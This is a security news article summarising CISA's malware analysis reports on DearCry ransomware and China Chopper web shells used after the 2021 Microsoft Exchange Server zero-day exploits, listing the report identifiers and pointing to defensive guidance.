CISA publishes reports on DearCry ransomware and China Chopper Web Shell malware linked to Exchange Server exploits (update-2)

CISA publishes reports on DearCry ransomware and  China Chopper Web Shell malware linked to Exchange Server exploits

The Cybersecurity and Infrastructure Security Agency (CISA) has published reports on DearCry ransomware and China Chopper Web Shell malware linked to recent Exchange Server exploits. Attackers can use this malware to further compromise on-premise Microsoft Exchange servers and launch other attacks.

That report also followed a CISA and FBI urgent joint cybersecurity alert last month on the Microsoft Exchange vulnerability exploits. Malicious cyber actors used zero-day exploits (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) to compromise thousands of Exchange servers around the globe.

In the updated alert, CISA added new information on DearCry ransomware and also seven China Chopper Web Shell malware analysis reports (MARs). Additional reports have been added for a new China Chopper Web Shell MAR and DearCry MAR on March 25 and April 12, respectively.

DearCry ransomware

Microsoft’s Security Intelligence team tweeted out information on DearCry ransomware used after compromising on-premise Exchange servers:

Microsoft further recommended Exchange Server customers urgently prioritize security updates as noted here.

In addition, CISA provided a Ransomware web page for guidance and resources organizations can use to raise awareness and provide actions organizations can use to help combat ransomware threats.

Furthermore, CISA added another malware analysis report on April 12 under AR21-102B (MAR-10330097-1.v1: DearCry Ransomware). The DearCry malware encrypts files on a device and demands ransom in exchange for decryption.

China Chopper Web Shells

CISA also provided malware details on a collection of nine malware strains dubbed China Chopper Web Shell malware.

The 11 malware samples include:

  1. AR21-072A: MAR-10328877.r1.v1: China Chopper Webshell
  2. AR21-072B: MAR-10328923.r1.v1: China Chopper Webshell
  3. AR21-072C: MAR-10329107.r1.v1: China Chopper Webshell
  4. AR21-072D: MAR-10329297.r1.v1: China Chopper Webshell
  5. AR21-072E: MAR-10329298.r1.v1: China Chopper Webshell
  6. AR21-072F: MAR-10329301.r1.v1: China Chopper Webshell
  7. AR21-072G: MAR-10329494.r1.v1: China Chopper Webshell
  8. AR21-084A*: MAR-10329496-1.v1: China Chopper Webshell
  9. AR21-084B*: MAR-10329499-1.v1: China Chopper Webshell
  10. AR21-102A**: MAR-10331466-1.v1: China Chopper Webshell

Two new webshells* (AR21-084A and AR21-084B) were added on March 25, 2021.

An additional China Chopper webshell** (AR21-102A) was added on April 12, 2021.

Attackers can use a webshell (a type of script) to upload to a compromised Exchange Server to enable remote administration of the system. These webshells can further be used to steal credentials, upload additional malware (such as used for watering hole attacks) or to use as command-and-control infrastructure, to name a few.

CISA also provided further Threat Awareness and Guidance on web shells to help organizations in fighting similar threats.

Readers can also check out more information on the Microsoft security advisories related to the Exchange Server RCE vulnerabilities exploited in the wild.

Updates on March 29: This article was updated to include two new China Chopper Webshell MARs.

Updates on April 13: This article was updated to include one new China Chopper Webshell MAR and an additional DearCry MAR.

Related Articles